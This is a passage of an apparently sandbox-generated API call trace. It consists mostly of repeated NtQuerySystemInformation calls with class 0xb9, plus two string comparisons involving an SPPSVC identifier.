ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.945] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.954] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, 